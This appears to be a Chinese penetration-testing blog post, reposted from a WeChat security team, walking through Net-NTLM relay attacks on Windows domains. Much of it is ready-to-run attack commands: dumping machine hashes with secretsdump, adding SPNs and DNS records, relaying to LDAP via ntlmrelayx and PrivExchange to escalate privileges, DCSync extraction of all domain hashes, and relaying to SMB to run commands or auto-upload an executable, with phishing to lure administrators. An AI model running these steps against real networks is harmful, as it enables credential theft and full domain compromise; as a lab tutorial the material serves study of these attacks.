域安全｜Net-NTLM Relay Attack

点击上方蓝字关注我们

0x00 基本原理

（1） Client端还是正常向服务端发送登录请求，由于client端此时并不知道攻击者的存在，它以为请求是发送给了server端，但实际上它是先发给了攻击者；

（2） 然后攻击者再拿着这个用户名伪装成client端发送给server端，此时server端正常返回一个challenge（挑战码）；

（3） 攻击者拿到这个challenge（挑战码）以后，再把它返回给client端；

（4） Client 端拿到 challenge 在本地和自己的密码DES加密以后，会把这个response再次发送给攻击者，此时client依然认为攻击者就是server端；

（5） 最后，攻击者会拿着client端发过来的这个response再把它交给server端去验证server端此时到自己的数据库中对比，发现hash一致认证通过, 可见一次简单的smb中间人攻击就这样完成了。

（1）工作组环境（用处不大）

在工作组环境里面，工作组中的机器之间相互没有信任关系，每台机器的账号密码 Hash 只是保存在自己的 SAM 文件中，这个时候 Relay 到别的机器可能性就不大，除非两台机器的账号密码一样，不然毫无意义。

（2）域环境（主要在域环境下攻击）

我们知道在域环境下所有域用户的账号密码 Hash 都保存在域控的 ntds.dit 里面。若没有限制域用户登录到某台机子，那就可以将该域用户 Relay 到别人的机子，或者是拿到域控的请求，将域控 Relay 到普通的机子，比如域管运维所在的机器。

目标机不能开启smb签名，否则利用无效，一般情况下 Windows Server 机器会默认开启，而Windows [win7/8/8.1/10]默认不会开启，可以利用nmap探测smb是否关闭。

一些打了ms08-068 [KB957097] 补丁的老系统，如 Windows xp/2003 以下的系统，也无法利用。

注意⚠️：域环境下域控默认开启 smb 签名

nmap -sT -p 445 -Pn --open --script smb-security-mode.nse 10.10.10.20
#需要关闭被攻击的域内机器HKEY_LOCAL_MACHIMESystemCurrentControlSetServicesLanManServerParameteEnableSecuritySignature = 0RequireSecuritySignature = 0

作用：在域环境中通过其他方式盗取域管认证后，继而从域控 relay 到普通域机器执行命令。

0x01 ntlmrelayx.py & Relay privexchange.py Attack

利用 Exchange SSRF 漏洞和 NTLM 中继沦陷域控

条件：

（1）域内账号

（2）存在exchange服务器

（3）修改攻击机hosts文件

快速命令：

#1、导出机器用户hashsecretsdump.py god.com/0x:"1qaz@WSX"@10.10.10.20
#2、手动添加SPNpython3 addspn.py -u god.com\win2012$ -p aad3b435b51404eeaad3b435b51404ee:11ac66c08ecc99ad7907687181cc2ea3 -s host/one.god.com 10.10.10.10 --additional
#3、指向SPNpython3 dnstool.py -u god.com\win2012$ -p aad3b435b51404eeaad3b435b51404ee:11ac66c08ecc99ad7907687181cc2ea3 -r one.god.com -d 10.10.10.1 --action add 10.10.10.10
注意⚠️：域外打需要添加、指向SPN——————————————————————————————————————————————————————————————
#4、中继监听python3 ntlmrelayx.py -t ldap://win-2016-dc.god.com --escalate-user 0x
#5、利用PrivExchange触发TGTpython3 privexchange.py -ah 10.10.10.1 10.10.10.20 -u 0x -p "1qaz@WSX" -d god.com
#6、直接导出DCsyncspython3 secretsdump.py god.com/0x:"1qaz@WSX"@win-2016-dc.god.com -just-dc

1、手动添加SPN

2、指向SPN

3、ntlmrelayx.py中继监听

ntlmrelayx.py -t ldap://win-2016-dc.god.com --escalate-user 0x

4、利用PrivExchange触发获取TGT+ACL提权

5、直接导出DCsyncs

0x02 smbrelayx.py Relay Attack 执行命令

1、VPS 上执行命令监听 80 和 445 端口，伪造 http 和 smb 服务

#SMBRelay攻击域内主机10.10.10.20，并执行 whoami 命令python3 smbrelayx.py -h 10.10.10.20 -c whoami

2、通过钓鱼或者其他手段诱导域管理员或域用户访问了攻击人员伪造的 HTTP 或 SMB 服务，访问 http://10.10.10.80 并输入账号密码进行认证：

3、此时就 Relay 成功获取到 192.168.0.128 的 system 权限（当然只是 whoami 命令，实战中可以直接远程加载 powershell 或者其他手段反弹 Shell 到 C2），或者访问任意资源。

dir \10.10.10.80c$

0x03 ntlmrelayx.py Relay Attack 执行命令

1、在VPS上执行如下命令监听 80 和 445 端口，伪造 http 和 smb 服务：

# SMBRelay 攻击10.10.10.20主机，并执行 whoami 命令python3 ntlmrelayx.py -t smb://10.10.10.20 -c whoami -smb2support
##自动上传并执行python3 ntlmrelayx.py -t smb://10.10.10.20 -smb2support -e a.exe

2、通过钓鱼或者其他手段诱导域管理员或域用户访问了攻击人员伪造的 HTTP 或 SMB 服务，访问http://10.10.10.80 并输入账号密码进行认证：

或者让域控随便访问一个资源使用 smb 触发：（因为它会检查本地 host 文件，然后检查 DNS，如果都不存在，就会通过 LLMNR 协议进行多播，在局域网中进行搜索。

此时可以在攻击机上看到 Responder 的响应，然后受害者的 Windows 机器会向攻击者进行身份验证）

dir \10.10.10.80c$

0x04 总结（使用 Responder & Inveigh ）

内网渗透中若利用 LLMNR/NetBIOS 劫持成功并获得了目标主机的 Net-NTLM Hash，可以进行爆破，但需要一个强大的字典，否则很难得到明文密码。

由于 Net-NTLM Hash 不像 NTLM-Hash，不能用 Net-NTLM Hash 来进行 Pass The Hash，那么可以尝试一下 NTLM Relay Attack。

感谢团队师傅Nolan也帮忙解决了一点小bug。

原文始发于微信公众号（灼剑安全团队）：域安全｜Net-NTLM Relay Attack